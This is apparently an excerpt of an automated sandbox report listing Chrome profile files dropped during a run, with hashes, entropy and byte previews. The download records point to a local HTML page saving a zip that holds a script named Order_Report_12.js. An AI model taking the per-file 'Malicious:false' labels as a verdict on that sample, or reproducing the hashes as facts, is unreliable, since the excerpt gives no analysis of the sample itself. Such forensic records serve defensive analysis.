                                                                                                                                                                SHA-512:6F900EDEA7F32C4F85622F5FD854B4FB1ABB494330EC637E557EEA17918CC0B3AEF02C4B7695F6558C0293D5281CB9A91CF94584EA776A175A450811A7DA811D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                 Preview: SQLite format 3 (remainder of preview is non-printable bytes)
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata.. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PDP-11 pure executable not stripped - version 110
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):568
                                                                                                                                                                Entropy (8bit):6.145403243894182
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:2vLOBwZDHVOBGJBVzu7xwDwZobAiUBVz7iPBVzJP:2pZ7LJ/zu7o4oby/z7S/zd
                                                                                                                                                                MD5:146B5BEAA4E5CF1AC630DCD71D25C41B
                                                                                                                                                                SHA1:6E4055716544A8B8312CDA96EE4EAFDDC46ECF3C
                                                                                                                                                                SHA-256:A9828D42F74D9959FBEDE9E6F0BF7A97367EC03789317BE51E9ED4A083D5BB1C
                                                                                                                                                                SHA-512:02168217291C6AA72194452CAFD4AF6E29E29BD4C12620CAB07D86BC9F9F635358EB8227D0F144D78061529A49D69A88776F602D2EBE274AFD9686E5DC43A0F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/a97e8999-2326-461e-9e14-63430d44f79c.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874.zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/a97e8999-2326-461e-9e14-63430d44f79c.."*file:///C:/Users/user/Desktop/file.html0.9......wBB0..blob:null/a97e8999-2326-461e-9e14-63430d44f79c..?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X...................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadataTM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):680
                                                                                                                                                                Entropy (8bit):6.098219793807082
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wPDdYZDHVO5PDMJBVzuEu7xwDwZobUPDlBVztnePDYMJBVzeqBVzDBVzu+Nm:wbdYZ7KbMJ/zuh7o4obUbl/zVebhJ/zE
                                                                                                                                                                MD5:86101CF5F599E51247715E7C293FA942
                                                                                                                                                                SHA1:9CB75E8D675264F35D447E4008457987BB756903
                                                                                                                                                                SHA-256:8584D978FD02B4E33526B555585C6E2071F637FD04A0D4A0A35418803F901E81
                                                                                                                                                                SHA-512:3EA98F3741F0BEE3057BD54118F68E355D5A0D0C4DE4AC6F289FE2F5CE8FA6DC0DD52279D3351DEECC94BBBBCD0C28B55F24BD4D5864ED767D7D4713918DADDE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..........blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.". .2.=.'.u.....@Y..yD..`.vC.4..[....."4..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."."..*file:///C:/Users/user/Desktop/file.html..*.0.J.Report_03874 (1).zipP.Z.en-US.....@..Order_Report_12.js...". ..B........o.$'.A.d..L....xR.U .8.@........(.0.8.@................blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8.."*file:///C:/Users/user/Desktop/file.html0.9..T...wBB0..blob:null/369ab1ab-090c-4863-8d32-ab64f6ec9cb8..i.*file:///C:/Users/user/Desktop/file.html.."*file:///C:/Users/user/Desktop/file.html0.9..J...wBP.X...?.*file:///C:/Users/user/Desktop/file.html..".0.9......wBP.X..................../
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):297
                                                                                                                                                                Entropy (8bit):3.669730444346079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXayz/t2Hmwg0EOZL7Ao4uhFkp:qTCTCTCTCTCTCTCT5z/t2qoEwhXeLKB
                                                                                                                                                                MD5:2A48F6DFAA57A9E17C611E8AF6152F1D
                                                                                                                                                                SHA1:DAD266E3A4C581ABDB7AF1B7EDB1C14B17DC4D13
                                                                                                                                                                SHA-256:624F373D66613F80EB99E4377ACAF4A6F3860EABA3A3D2A910698EA00F48775D
                                                                                                                                                                SHA-512:AE0AFCDBDDF665C75AE40A3A8A395256FD4F2908B69953956AB839BAB7C3FFD1B8996E90C9B9D0BAB35A55DD342375C8F710FA1708945C9CF918A07BAFEC005F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................i.Wd...............Sgdaefkejpgkiemlaofpalmlakkmbjdnl.declarative_rules.declarativeContent.onPageChanged.[]..F..................F................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.215620167821546
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oYVq2PlLN23iKKdK8aPrqIFUtpvomgZmwPvomIkwOlLN23iKKdK8amLJ:wAvy5KkL3FUtpg7/PgR5L5KkQJ
                                                                                                                                                                MD5:315715B62CFD985D9B7A06526D074548
                                                                                                                                                                SHA1:E42ECCD26CAA203C90534E89CBB92ECD1B1FE2B1
                                                                                                                                                                SHA-256:414F5B6D58AD9CB699F49B9760BBD2E98FCEE81FA816BDBDF9C2F4E5A2070DF8
                                                                                                                                                                SHA-512:77D093E16F2F95ECC37172E1226974BE2EFBCB4B1CF1766C676CC645742B8A1A754804332C1578027F0ADFEA1A0AC88E3F605610758747420344FF3357831988
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.732 1d94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/08/16-19:10:30.734 1d94 Recovering log #3.2021/08/16-19:10:30.734 1d94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.oldl- (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.215620167821546
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oYVq2PlLN23iKKdK8aPrqIFUtpvomgZmwPvomIkwOlLN23iKKdK8amLJ:wAvy5KkL3FUtpg7/PgR5L5KkQJ
                                                                                                                                                                MD5:315715B62CFD985D9B7A06526D074548
                                                                                                                                                                SHA1:E42ECCD26CAA203C90534E89CBB92ECD1B1FE2B1
                                                                                                                                                                SHA-256:414F5B6D58AD9CB699F49B9760BBD2E98FCEE81FA816BDBDF9C2F4E5A2070DF8
                                                                                                                                                                SHA-512:77D093E16F2F95ECC37172E1226974BE2EFBCB4B1CF1766C676CC645742B8A1A754804332C1578027F0ADFEA1A0AC88E3F605610758747420344FF3357831988
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.732 1d94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/08/16-19:10:30.734 1d94 Recovering log #3.2021/08/16-19:10:30.734 1d94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.203545179149585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o4FUJq2PlLN23iKKdK8NIFUtpvoxZmwPvoWSPkwOlLN23iKKdK8+eLJ:w4uJvy5KkpFUtpgx/PgWSP5L5KkqJ
                                                                                                                                                                MD5:557F7826A7D364DD122FC2CF58863D49
                                                                                                                                                                SHA1:1AC796E007983F42FF2A8D2B5EAFF330E055C7EA
                                                                                                                                                                SHA-256:27C893D1AB7624FC1AFAFE7B4222E9028B98F7C7727551C7A4B905FEAA426654
                                                                                                                                                                SHA-512:473DF312DB55D65C6992D7FFB5CFD4CBC0F9FA75A7BA19FEE50D6DAB916F9D79E243C65F13BA6F8D9FBD0CE46F6405AAAE28FB223470BD1436769218A1712C36
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.902 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/08/16-19:10:30.903 1d74 Recovering log #3.2021/08/16-19:10:30.905 1d74 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.oldTM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.203545179149585
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o4FUJq2PlLN23iKKdK8NIFUtpvoxZmwPvoWSPkwOlLN23iKKdK8+eLJ:w4uJvy5KkpFUtpgx/PgWSP5L5KkqJ
                                                                                                                                                                MD5:557F7826A7D364DD122FC2CF58863D49
                                                                                                                                                                SHA1:1AC796E007983F42FF2A8D2B5EAFF330E055C7EA
                                                                                                                                                                SHA-256:27C893D1AB7624FC1AFAFE7B4222E9028B98F7C7727551C7A4B905FEAA426654
                                                                                                                                                                SHA-512:473DF312DB55D65C6992D7FFB5CFD4CBC0F9FA75A7BA19FEE50D6DAB916F9D79E243C65F13BA6F8D9FBD0CE46F6405AAAE28FB223470BD1436769218A1712C36
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.902 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/08/16-19:10:30.903 1d74 Recovering log #3.2021/08/16-19:10:30.905 1d74 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_1\_metadata\computed_hashes.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11336
                                                                                                                                                                Entropy (8bit):6.0707244876366575
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:AbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Ab+nldByaFx4toj8VEPT
                                                                                                                                                                MD5:2E2110A99AD3AE9721A458C95C64C868
                                                                                                                                                                SHA1:72AE17599EDC0B2DC61C41D946E3E296864F2CBA
                                                                                                                                                                SHA-256:BB46BA705D5F6F43F66B07EA5DA4CC7CC0BF8FE635CCC4EBBA30A5D4A54158DE
                                                                                                                                                                SHA-512:29D95D043F3E529DD33F73B3207A9167D479D9FC404209497B53229CF68AA634CB8A1FE3FD08512FD7F48AFB567144DB873FBBDAD8171D42968B97357F06BC1E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\9221.427.0.1_0\_metadata\computed_hashes.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26178
                                                                                                                                                                Entropy (8bit):6.060546316291638
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:0kHklriTcXkIqE4Cq022fehEH/TdMKGRlhKlkIALQgtTrs8bMJ/1IM6vvSi3hJnz:0kE1i4kIlg2Wi5GRSkIhqWy1vnJ3GOHJ
                                                                                                                                                                MD5:E7FC5462366916AA507D0D350BF1BE86
                                                                                                                                                                SHA1:0D250D97A4FAA070DCE2BE246F14656800EE6561
                                                                                                                                                                SHA-256:84F230EAF1D18C25F8336F3ADEB490847D2ABFF6D4B30E7744C0D2B5790F84F6
                                                                                                                                                                SHA-512:F07D080196055AAD3AF5F0231C05AE6EF54FFA4C035775C7CE32B0A57EF254A79A05FB7ACED60D3F0F5A785C6846E675949F99161C32F81B977EB25ABEFAAB18
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.235760982564769
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oGj+L+q2PlLN23iKKdKWT5g1IdqIFUtpvoGH11ZmwPvoGHjLVkwOlLN23iKKd6:wvL+vy5Kkg5gSRFUtpgWX/PgWjLV5L5N
                                                                                                                                                                MD5:1AB12A2813537D045E008AF734F304FD
                                                                                                                                                                SHA1:388DF5EDD8E8FED12F307643349D34D38A18DF90
                                                                                                                                                                SHA-256:DAF82AB122C21B3E3E3CEAACD41615A03ADC35E1BC75734A8EF58587976140FB
                                                                                                                                                                SHA-512:BBEE8FC2F0289DF518FFBD7D2829877B77E552D4FE1130867225FE80920966BB2A534CF86DF51C288CE4059983B0DBE94759599BE55CAC19D1F23DD6C187D943
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:34.291 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/08/16-19:10:34.292 1c7c Recovering log #3.2021/08/16-19:10:34.292 1c7c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.oldG (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.235760982564769
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oGj+L+q2PlLN23iKKdKWT5g1IdqIFUtpvoGH11ZmwPvoGHjLVkwOlLN23iKKd6:wvL+vy5Kkg5gSRFUtpgWX/PgWjLV5L5N
                                                                                                                                                                MD5:1AB12A2813537D045E008AF734F304FD
                                                                                                                                                                SHA1:388DF5EDD8E8FED12F307643349D34D38A18DF90
                                                                                                                                                                SHA-256:DAF82AB122C21B3E3E3CEAACD41615A03ADC35E1BC75734A8EF58587976140FB
                                                                                                                                                                SHA-512:BBEE8FC2F0289DF518FFBD7D2829877B77E552D4FE1130867225FE80920966BB2A534CF86DF51C288CE4059983B0DBE94759599BE55CAC19D1F23DD6C187D943
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:34.291 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/08/16-19:10:34.292 1c7c Recovering log #3.2021/08/16-19:10:34.292 1c7c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):181072
                                                                                                                                                                Entropy (8bit):5.774426487043815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:avbYFOZyYb37psk2SVlfN/qskVMxoZ51+XBY95/E5cCDd4QAOXxfzUBn2Y2l3P:a8Y7wqFTkVMO51+XBY96Nd4ByVuV2l3P
                                                                                                                                                                MD5:1B40AC9ABB964672109D49ABFCFE2717
                                                                                                                                                                SHA1:966E224F2887075825D42D2E7E0063BFAA81A99C
                                                                                                                                                                SHA-256:503149B1B47F8296DEDB800251DBD9AF614856F0D7E6AB1C03DBC90EBCE53674
                                                                                                                                                                SHA-512:00B50E49CAFD8246102BB460C7B96C20B50A2DDCB48A64C40D65901B517A2698DB9C5AA5EC7F143314DDB8D74624377F12A95C7F4D9FCE206473E8BBF126388B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                Entropy (8bit):0.5451957136647383
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:BNxVP72KQzPkaf+bDo3irhnymCvVj3XBBE3u:TPpQzPkaQU3iVymCJBBE3u
                                                                                                                                                                MD5:19FF44D335B1812973DCA346147919BD
                                                                                                                                                                SHA1:A34E1C0596DE4A3958CA1EF17CB2E33EE94BB0EB
                                                                                                                                                                SHA-256:C95E6117EC1F7751148A8C189C9C4DBB6DA930B83C7E83FD1F6C2B1F40E72EB5
                                                                                                                                                                SHA-512:8A41FA9E02956A9338F543EC78C12B52EA06189E9B6489DF23E81EA04B3E110776192DD97B315F30768C7AF4BCD11F5B4E5F87293D6741E5F1328B1129D45F95
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):444
                                                                                                                                                                Entropy (8bit):5.100226056585388
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:AwB3exxeANghfivRfAsVbBk778B/xgsgdNRBVzy3KJkWGq:Aw0gLs/Y78BJgscL/zmGkWP
                                                                                                                                                                MD5:66F3AFEDD3F974A52AFE00662EB39CE9
                                                                                                                                                                SHA1:BF85638CCDA69D054CEB6ADF2520F6862233EC23
                                                                                                                                                                SHA-256:D09B1C38988E6C243BEBA144CB87F336BF4D7B55FC95B1C66195ACFCAB46FE2B
                                                                                                                                                                SHA-512:A379A91BBFB150636A9A3E04EDFE6FE402D12B401DF1F141D86138203335FFBA87B7CF780B05D311950ED1B35100773154866CDA5CDAA7E076090F8B872A0663
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .........."*....user..c..desktop..file..html..users*B......user......c......desktop......file......html......users..2.........a........c........d.........e...........f.........h........i........k........l..........m........o.........p........r.........s.........t.........u...:8........................................................BR...N...... .......**file:///C:/Users/user/Desktop/file.html2.:...............J..............!&
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                Entropy (8bit):0.22018035706688846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:iNlljq7A/mhWJFuQ30VkWUMC/+/dwenqFtjE9SFcTpL0WWZ3V9RUIuqCn:d7/VkF/+/d4FS99pLTolTCn
                                                                                                                                                                MD5:4F5532A4CE61AA94CE61DEC33185604B
                                                                                                                                                                SHA1:3BF3DD8E4A5B889AF75FDE6ACDA54779275CDD69
                                                                                                                                                                SHA-256:0A66B63031E8F13DBFCE5841E37BD84B9752F05D4DD8C0BB48B80BE4F85F702B
                                                                                                                                                                SHA-512:9812224166897580708AF3D438DA024FFEB27BDD0EFC09FB443514BCF7A5ABF73B43EC797281C96EE0AC248550381CB17CFBDC0F13A6214962C6FF3F3763672E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1915
                                                                                                                                                                Entropy (8bit):5.529709558582304
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:3/AK84tRVB7wYmVBHbgGrFefbVbXsGbj1ziAsbtwVbtEr4tMjDj1fzBjQfPBOVBh:3tpIDYGJ8gLidUbQfoiT2GK
                                                                                                                                                                MD5:AC56BDE3BFDE0308CAE85E90F85192F9
                                                                                                                                                                SHA1:91C846E2081CC6A586321701A143458015E0F5E6
                                                                                                                                                                SHA-256:7F229A533E1E1A835EE5B356C92E8C7432D285618C9BE7397890090CC26F02C5
                                                                                                                                                                SHA-512:184D885A17F302621EBEB4EA1F38A14339331E4C0004BD9233DA8B1AB6277526950F7D4F3BC90455406AA11D73F537F20BAF3E5F7A6303BB702BE666F82CA759
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .K..t................VERSION.1.8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm............Q_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.CloudProvider7.{"cloudEnabled":false,"notifiedHangoutsPrivacy":false}.S_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.IdentityService6.{"signedIn":false,"userEmail":null,"kioskAuth":false}.Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2021-08-16 19:11:58.08][INFO][mr.Init] MR instance ID: 8762dce2-debf-418a-adaa-647ac7c3b72d\n","[2021-08-16 19:11:58.08][INFO][mr.Init] Native Cast MRP is enabled.\n","[2021-08-16 19:11:58.08][INFO][mr.Init] Native Mirroring Service is enabled.\n","[2021-08-16 19:11:58.08][INFO][mr.PersistentDataManager] initialize: 0 chars used, 0 other chars\n","[2021-08-16 19:11:58.08][INFO][mr.Cloud
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):336
                                                                                                                                                                Entropy (8bit):5.124326389331365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oipQL+q2PlLN23iKKdK8a2jMGIFUtpvoDGKWZmwPvo9QLVkwOlLN23iKKdK8as:wipQ+vy5Kk8EFUtpgDGKW/Pg9QV5L5KV
                                                                                                                                                                MD5:8078D89334951C7E58008BC0CB53E04D
                                                                                                                                                                SHA1:0E4A094DDE19EEE1AD2E8994D3993FB5DB0B3B0C
                                                                                                                                                                SHA-256:3D17A93404F91549B6F071851CC9375F10174BCFE31843A497C9A043841E6D79
                                                                                                                                                                SHA-512:E7FB71ABB935CE2D4332AF9E6DE30A8CC7B8947AE5FA1B380BF1AEFDD97EFB5991ACB22B8CCE7E46017F053FEC6928793C625BC004929C8D41B6F604F3CF33D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.555 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.556 1eec Recovering log #3.2021/08/16-19:10:31.558 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):336
                                                                                                                                                                Entropy (8bit):5.124326389331365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oipQL+q2PlLN23iKKdK8a2jMGIFUtpvoDGKWZmwPvo9QLVkwOlLN23iKKdK8as:wipQ+vy5Kk8EFUtpgDGKW/Pg9QV5L5KV
                                                                                                                                                                MD5:8078D89334951C7E58008BC0CB53E04D
                                                                                                                                                                SHA1:0E4A094DDE19EEE1AD2E8994D3993FB5DB0B3B0C
                                                                                                                                                                SHA-256:3D17A93404F91549B6F071851CC9375F10174BCFE31843A497C9A043841E6D79
                                                                                                                                                                SHA-512:E7FB71ABB935CE2D4332AF9E6DE30A8CC7B8947AE5FA1B380BF1AEFDD97EFB5991ACB22B8CCE7E46017F053FEC6928793C625BC004929C8D41B6F604F3CF33D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.555 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.556 1eec Recovering log #3.2021/08/16-19:10:31.558 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                Entropy (8bit):0.7766145155282294
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:2a3WBA+IIYICVEq8MX0D0HSFlNUK6lGNxGt7KLk8s8LKvUf9KVyJ7hU:Z2FCn8MZyFlulGNxGt7KLyeymw
                                                                                                                                                                MD5:5BA75311B1B0D6276E298ECCD12B8B07
                                                                                                                                                                SHA1:AD9ABB15695F177530511DFD188EB8C33B8F7929
                                                                                                                                                                SHA-256:AEB7F25D09A00715C768CB87BA66EE544830347F998CCF218DE5C2072C4AAF3E
                                                                                                                                                                SHA-512:B60C61AA8F0448365E90B8076A04BBCF945A289E4B851648925B53F9340B89C97553B28D63753A91E53AD64D34C19DB294913DB159A934DF9B5AFCBF951E0617
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ ...
